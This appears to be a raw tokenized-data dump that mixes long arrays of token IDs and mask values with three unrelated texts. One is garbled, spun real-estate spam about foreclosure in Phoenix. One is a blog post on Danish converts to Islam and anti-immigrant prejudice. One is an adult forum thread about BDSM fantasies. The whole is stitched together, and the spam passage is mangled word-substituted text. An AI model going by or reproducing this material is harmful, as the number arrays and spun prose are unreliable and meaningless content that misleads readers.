1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 ]
What Does Stop My Foreclosure Phoenix Mean? This could present you with time for you to take a look at choices to foreclosure with your lender. (Browse more about how personal bankruptcy can assist with foreclosure.)Foreclosures ordinarily consider among two major paths: judicial (in court docket) or nonjudicial (outside of court docket). If your household bank loan is secured by a house loa Avoid disrupting your daily life with showings to strangers, inconvenient open up houses and ruined weekends.We will purchase your property directly from you, and also move you on your new house without spending a dime. Ask for your buy give these days!People from all walks of existence sell to us, but all of them share one thing in popular: they Compared with common real estate organizations, with Offerpad, you don't need to list your house with a real estate agent, buy costly repairs, or get worried that a consumer will back again out on the contract.Directions: You are going to be introduced with a few simple thoughts. If you are answering, keep the following in mind: Response Each indiv In essence, When you have a residence and need to sell it… we’d choose to make you a fair funds give and close on it once you’re wanting to sell.My son referred to as We Acquire Ugly Houses and build a meeting. They gave me a proposal within the place. Was I intending to make A huge number of pounds off the deal? No. Was I delighted to simply Full this kind so as to obtain a No cost Situation Overview from an area malpractice legal professional that serves your location. There isn't a obligation and you may be contacted shortly after the kind is submitted.point out ”“ house title remains in belief right up until your loan is compensated off. Authorized title is held by your lender,
[ 1, 1724, 5538, 22303, 1619, 28297, 25071, 29715, 16316, 29973, 13, 13, 4013, 1033, 2198, 366, 411, 931, 363, 366, 304, 2125, 263, 1106, 472, 19995, 304, 29821, 5409, 545, 411, 596, 301, 1581, 29889, 313, 29933, 798, 344, 901, 1048, 920, 7333, 9124, 6685, 1270, 508, 6985, 411, 29821, 5409, 545, 1846, 29943, 487, 11291, 1973, 22420, 6275, 2050, 4249, 1023, 4655, 10898, 29901, 6577, 5611, 313, 262, 8973, 437, 3522, 29897, 470, 1661, 17675, 5611, 313, 449, 2975, 310, 8973, 437, 3522, 467, 960, 596, 22329, 9124, 24806, 338, 26130, 491, 263, 3699, 658, 29874, 13, 13, 29909, 5405, 766, 6685, 292, 596, 14218, 2834, 411, 1510, 886, 304, 851, 13873, 29892, 22629, 854, 993, 1722, 701, 12955, 322, 5796, 1312, 4723, 1975, 29889, 4806, 674, 20590, 596, 2875, 4153, 515, 366, 29892, 322, 884, 4337, 366, 373, 596, 716, 3699, 1728, 805, 2548, 263, 270, 603, 29889, 26579, 363, 596, 15649, 2367, 1438, 3841, 29991, 15666, 1991, 515, 599, 17042, 2039, 310, 10379, 19417, 304, 502, 29892, 541, 599, 310, 963, 6232, 697, 2655, 297, 5972, 29901, 896, 13, 13, 6843, 1965, 411, 3619, 1855, 19989, 25700, 29892, 411, 4587, 571, 8305, 29892, 366, 1016, 29915, 29873, 817, 304, 1051, 596, 3699, 411, 263, 1855, 19989, 10823, 29892, 15649, 3438, 368, 1634, 7121, 29892, 470, 679, 6365, 1255, 393, 263, 21691, 674, 1250, 1449, 714, 373, 278, 8078, 29889, 29928, 533, 1953, 29901, 887, 526, 2675, 304, 367, 9129, 411, 263, 2846, 2560, 13133, 29889, 960, 366, 526, 22862, 29892, 3013, 278, 1494, 297, 3458, 29901, 13291, 7806, 1399, 440, 13, 13, 797, 3686, 663, 29892, 1932, 366, 505, 263, 25488, 322, 817, 304, 19417, 372, 30098, 591, 30010, 29881, 6755, 304, 1207, 366, 263, 6534, 29199, 2367, 322, 3802, 373, 372, 2748, 366, 30010, 276, 24507, 304, 19417, 29889, 3421, 1487, 12992, 304, 408, 1334, 7255, 1548, 501, 16808, 379, 23676, 322, 2048, 263, 11781, 29889, 2688, 4846, 592, 263, 24963, 2629, 278, 2058, 29889, 12547, 306, 938, 2548, 304, 1207, 319, 12176, 1353, 310, 24261, 1283, 278, 5376, 29973, 1939, 29889, 12547, 306, 15319, 287, 304, 3763, 13, 13, 13658, 445, 2924, 577, 408, 304, 4017, 263, 1939, 3438, 23920, 362, 6811, 1493, 515, 385, 4038, 4439, 29886, 1461, 625, 11706, 10257, 393, 19700, 596, 4423, 29889, 1670, 3508, 29915, 29873, 263, 10788, 362, 322, 366, 1122, 367, 6958, 287, 21734, 1156, 278, 2924, 338, 18397, 29889, 3149, 714, 26622, 30015, 3699, 3611, 9242, 297, 17750, 1492, 701, 2745, 596, 24806, 338, 22874, 630, 1283, 29889, 13361, 1891, 3611, 338, 4934, 491, 596, 301, 1581, 29892 ]
[ 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 ]
Cultural identity: the new religion After my father’s conversion to Islam in the late 1950s, my grandmother, a devout Catholic, never questioned his right to make that choice. Granted, she worried till the her final days for his immortal soul, but she never viewed him as less American or a part of the family for leaving the Church. I think more than a mother’s love was at work there–I think it was the result of an intuitive understanding of religious faith and the spiritual and emotion imperative to follow one’s conscience. I don’t think she was particularly ecumenical in outlook and she certainly didn’t approve of his decision to embrace this exotic religion, but I think she could relate to his change on a certain level, and she didn’t find his religious conversion a threat to her identity, whether religiously or culturally. One would expect people who are "secular" in the fullest sense of the word, namely people who lack any religious faith at all, to be the least threatened by others’ religious beliefs–From their perspective, it’s just another fable people comfort themselves with, as opposed to a repudiation of the Truth–but in my experience the opposite often seems to be the case. Discussing my mother’s conversion from Lutheranism to Islam–she converted in Copenhagen in 1970–with relatives and friends in Denmark the early 1990s, I was struck by how radically different the reaction of some was from that of my grandmother in the USA. Though many admitted to being agnostics or even atheists, their reaction against the idea of a Danish woman abandoning a religion that many Danes seem to remember only two days a year–i.e., at Christmas and Easter–and embracing Islam was intense and deepseated. Something far more sacred for them than religion seems to have been challenged. Their cultural identity was in jeopardy. I’ve always suspected that for these reasons that hyper-secularized Scandinavia, even with its tradition of compassion and social solidarity–a source of pride for me all my life, especially as America turned rightward after the lamentable advent of the Reagan Revolution–had the potential for great inter-religious strife. Events in Denmark in recent years seem to be bearing out my theory. With this in mind, here’s a report from an article from The Torch[which is in Danish, though there is an English section on the website], an unabashedly leftist and activist journal of social commentary in Denmark, about the increasing prejudice and zenophobia against immigrants being seen in Denmark today. I’ve provided a rough (and quite inelegant) translation, with the original in brackets: Recently, the Minority Party publicized an email written by the head of the Danish People’s Party Kenneth Kristensen in which he laments that one cannot simply expel Danes who convert to Islam from their country and expresses his desire to penalize Danish Muslims merely for their choice of religion. "There is no doubt that many of these people are far more dangerous than those we’ve gotten from the Middle East. Unfortunately, we have no way to expell them, but we can ensure that security services keep a close eye on them."[For nylig kunne Minoritetspartiet offentliggøre en email fra Dansk Folkepartis Ungdoms landsformand, Kenneth Kristensen, hvori han ærgrer sig over, at man ikke bare kan landsforvise danskere, som konverterer til islam, og hvor han udtrykker ønske om at kriminalisere danske muslimer alene på grund af deres valg af religion: "Der er ingen tvivl om, at mange af disse personer er endnu farligere end dem vi har fået fra Mellemøsten. Desværre har vi ingen mulighed for at udvise disse, men vi kan sørge for at efterretningstjenesten holder et vågent øje med dem."] It’s fascinating how some secularists seem incapable of understanding the phenomenon of religious conversion or of entertaining the idea that it might be the result of a sincere change of heart. It’s equally intriguing, and profoundly concerning, how ferociously those same people react to any challenge to their ersatz religion, this nebulous but all-important cultural and national identity. Combine such Jacobin secularism with intense prejudice and you have a recipe for senseless conflict in any reasonably diverse society, and an inspiration for zealotry worthy of the Taliban.
[ 1, 23287, 10110, 29901, 278, 716, 13433, 13, 13, 13555, 590, 4783, 30010, 29879, 11301, 304, 16427, 297, 278, 5683, 29871, 29896, 29929, 29945, 29900, 29879, 29892, 590, 4595, 29885, 1228, 29892, 263, 2906, 449, 11865, 29892, 2360, 1139, 287, 670, 1492, 304, 1207, 393, 7348, 29889, 1632, 9714, 29892, 1183, 6365, 1255, 3428, 278, 902, 2186, 3841, 363, 670, 5198, 441, 284, 10752, 29892, 541, 1183, 2360, 24774, 1075, 408, 3109, 3082, 470, 263, 760, 310, 278, 3942, 363, 10124, 278, 6291, 29889, 306, 1348, 901, 1135, 263, 5637, 30010, 29879, 5360, 471, 472, 664, 727, 29994, 29902, 1348, 372, 471, 278, 1121, 310, 385, 27951, 573, 8004, 310, 12962, 10847, 322, 278, 20954, 322, 953, 8194, 10112, 1230, 304, 1101, 697, 30010, 29879, 27688, 29889, 306, 1016, 30010, 29873, 1348, 1183, 471, 10734, 21226, 14170, 936, 297, 714, 6914, 322, 1183, 8959, 3282, 30010, 29873, 2134, 345, 310, 670, 10608, 304, 953, 13842, 445, 429, 13574, 13433, 29892, 541, 306, 1348, 1183, 1033, 29279, 304, 670, 1735, 373, 263, 3058, 3233, 29892, 322, 1183, 3282, 30010, 29873, 1284, 670, 12962, 11301, 263, 28469, 304, 902, 10110, 29892, 3692, 12962, 368, 470, 4185, 332, 635, 29889, 13, 13, 6716, 723, 2149, 2305, 1058, 526, 376, 3471, 1070, 29908, 297, 278, 2989, 342, 4060, 310, 278, 1734, 29892, 18451, 2305, 1058, 10225, 738, 12962, 10847, 472, 599, 29892, 304, 367, 278, 3203, 29513, 491, 4045, 30010, 12962, 17750, 29879, 29994, 4591, 1009, 18520, 29892, 372, 30010, 29879, 925, 1790, 285, 519, 2305, 13016, 6053, 411, 29892, 408, 15869, 304, 263, 1634, 4749, 362, 310, 278, 1605, 2806, 29994, 4187, 297, 590, 7271, 278, 11564, 4049, 2444, 304, 367, 278, 1206, 29889, 13, 13, 4205, 13571, 292, 590, 5637, 30010, 29879, 11301, 515, 24760, 273, 1608, 304, 16427, 29994, 11360, 11543, 297, 315, 3150, 25771, 297, 29871, 29896, 29929, 29955, 29900, 29994, 2541, 14576, 322, 7875, 297, 3384, 3502, 278, 4688, 29871, 29896, 29929, 29929, 29900, 29879, 29892, 306, 471, 15469, 491, 920, 2971, 1711, 1422, 278, 19848, 310, 777, 471, 515, 393, 310, 590, 4595, 29885, 1228, 297, 278, 8278, 29889, 14832, 1784, 20186, 304, 1641, 946, 6582, 1199, 470, 1584, 472, 354, 2879, 29892, 1009, 19848, 2750, 278, 2969, 310, 263, 3951, 728, 6114, 11807, 292, 263, 13433, 393, 1784, 3951, 267, 2833, 304, 6456, 871, 1023, 3841, 263, 1629, 29994, 29875, 29889, 29872, 1696, 472, 17661, 322, 382, 1901, 29994, 392, 7232, 945, 292, 16427, 471, 17818, 344, 322, 6483, 344, 630, 29889, 12538, 2215, 901, 26546, 363, 963, 1135, 13433, 2444, 304, 505, 1063, 18066, 287, 29889, 11275, 16375, 10110, 471, 297, 1444, 459, 538, 29891, 29889, 13, 13, 29902, 30010, 345, 2337, 2858, 6021, 393, 363, 1438, 9590, 393, 11266, 29899, 3471, 1070, 1891, 2522, 392, 262, 12751, 29892, 1584, 411, 967, 11399, 310, 752, 465, 291, 322, 5264, 7773, 279, 537, 29994, 29874, 2752, 310, 24967, 363, 592, 599, 590, 2834, 29892, 7148, 408, 6813, 6077, 1492, 1328, 1156, 278, 301, 1166, 519, 17623, 310, 278, 830, 18939, 14595, 29994, 21312, 278, 7037, 363, 2107, 1006, 29899, 2674, 335, 2738, 851, 1607, 29889, 28488, 297, 3384, 3502, 297, 7786, 2440, 2833, 304, 367, 24638, 714, 590, 6368, 29889, 13, 13, 3047, 445, 297, 3458, 29892, 1244, 30010, 29879, 263, 3461, 515, 385, 4274, 515, 450, 4794, 305, 29961, 4716, 338, 297, 3951, 728, 29892, 2466, 727, 338, 385, 4223, 4004, 373, 278, 4700, 1402, 385, 443, 370, 1161, 23244, 2175, 391, 322, 5039, 391, 8955, 310, 5264, 3440, 653, 297, 3384, 3502, 29892, 1048, 278, 10231, 758, 17675, 625, 322, 503, 264, 3021, 711, 423, 2750, 5198, 4481, 1934, 1641, 3595, 297, 3384, 3502, 9826, 29889, 306, 30010, 345, 4944, 263, 12164, 313, 392, 3755, 297, 29872, 1397, 424, 29897, 13962, 29892, 411, 278, 2441, 297, 20476, 29901, 13, 13, 4789, 2705, 29892, 278, 21987, 537, 9173, 970, 1891, 385, 4876, 3971, 491, 278, 2343, 310, 278, 3951, 728, 11647, 30010, 29879, 9173, 28576, 17773, 14762, 297, 607, 540, 301, 20060, 393, 697, 2609, 3763, 1518, 295, 3951, 267, 1058, 3588, 304, 16427, 515, 1009, 4234, 322, 4653, 267, 670, 13521, 304, 6584, 284, 675, 3951, 728, 23772, 29879, 13586, 363, 1009, 7348, 310, 13433, 29889, 376, 8439, 338, 694, 7404, 393, 1784, 310, 1438, 2305, 526, 2215, 901, 18215, 1135, 1906, 591, 30010, 345, 2355, 841, 515, 278, 14253, 6932, 29889, 11511, 29892, 591, 505, 694, 982, 304, 1518, 514, 963, 29892, 541, 591, 508, 9801, 393, 6993, 5786, 3013, 263, 3802, 10977, 373, 963, 1213, 29961, 2831, 302, 2904, 335, 15465, 484, 21987, 7369, 1028, 442, 2035, 1283, 296, 3473, 29887, 30077, 276, 427, 4876, 5227, 9353, 29895, 8301, 446, 1595, 275, 29005, 3129, 29879, 12625, 689, 392, 29892, 28576, 17773, 14762, 29892, 298, 29894, 4170, 5905, 29871, 17930, 629, 261, 4365, 975, 29892, 472, 767, 27408, 16079, 6841, 12625, 1454, 29894, 895, 1465, 29895, 406, 29892, 1047, 4139, 13549, 261, 6928, 338, 5288, 29892, 3671, 29768, 5905, 11430, 2202, 29895, 3946, 29871, 30077, 1983, 446, 2703, 472, 413, 28479, 275, 406, 1465, 446, 2301, 2576, 261, 394, 1600, 3548, 19816, 2511, 589, 267, 659, 29887, 2511, 13433, 29901, 376, 15383, 604, 24386, 9631, 440, 29880, 2703, 29892, 472, 767, 479, 2511, 29340, 2022, 261, 604, 1095, 3433, 2215, 3473, 406, 1095, 1261, 3516, 4023, 28105, 300, 5227, 341, 1808, 29885, 30077, 3510, 29889, 2726, 29894, 17930, 276, 4023, 3516, 24386, 15065, 25398, 363, 472, 11430, 29894, 895, 29340, 29892, 1757, 3516, 6841, 269, 10181, 479, 363, 472, 12057, 2267, 1076, 303, 4142, 26826, 19464, 634, 325, 30020, 5362, 29871, 30077, 1324, 1612, 1261, 1213, 29962, 13, 13, 3112, 30010, 29879, 21028, 262, 1218, 920, 777, 5226, 1070, 2879, 2833, 297, 5030, 519, 310, 8004, 278, 27791, 265, 310, 12962, 11301, 470, 310, 22684, 292, 278, 2969, 393, 372, 1795, 367, 278, 1121, 310, 263, 269, 3742, 406, 1735, 310, 5192, 29889, 13, 13, 3112, 30010, 29879, 18018, 11158, 5526, 292, 29892, 322, 2600, 618, 368, 19813, 29892, 920, 285, 1489, 455, 5794, 1906, 1021, 2305, 7657, 304, 738, 18766, 304, 1009, 17730, 4101, 13433, 29892, 445, 452, 8645, 681, 541, 599, 29899, 17001, 16375, 322, 4797, 10110, 29889, 422, 26062, 1316, 10968, 262, 5226, 1070, 1608, 411, 17818, 344, 758, 17675, 625, 322, 366, 505, 263, 9522, 412, 363, 4771, 6393, 14529, 297, 738, 2769, 2197, 16984, 12459, 29892, 322, 385, 8681, 12232, 363, 3777, 284, 327, 719, 24717, 310, 278, 10288, 747, 273, 29889 ]
[ 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 ]
Is there anyone else with out there with fantasies they want to get out? Am I the only one that wants more then the ordinary sex life and craves something stronger? For as long as I can remember the idea of being hand cuffed and blind folded in front of people I don't know (with the exception of one that I trust) as they have there way with me in so many ways and variations(spanking, whips, oral sex, even once electrocution) has turned me on to the point I'm on fire. Is there anyone else with out there fantasy's that wants to get out? (Doesn't need to be like mine) Am I the only one that wants more then the ordinary sex life and craves something stronger? For as long as I can remember the idea of being hand cuffed and blind folded in front of people I don't know (with the exception of one that I trust) as ... Am I the only one that wants more then the ordinary sex life and craves something stronger? For as long as I can remember the idea of being hand cuffed and blind folded in front of people I don't know (with the exception of one that I trust) as they have there way with me in so many ways and variations(spanking, whips, oral sex, even once electrocution) has turned me on to the point I'm on fire. Is there anyone else with out there fantasy's that wants to get out? (Doesn't need to be like mine) No, you're definitely not. While I'm not interested in the group sex...I definitely am interested in kinky sex that's different from normal. Unfortunately, my girlfriend is a more "traditional" sex kind of person.
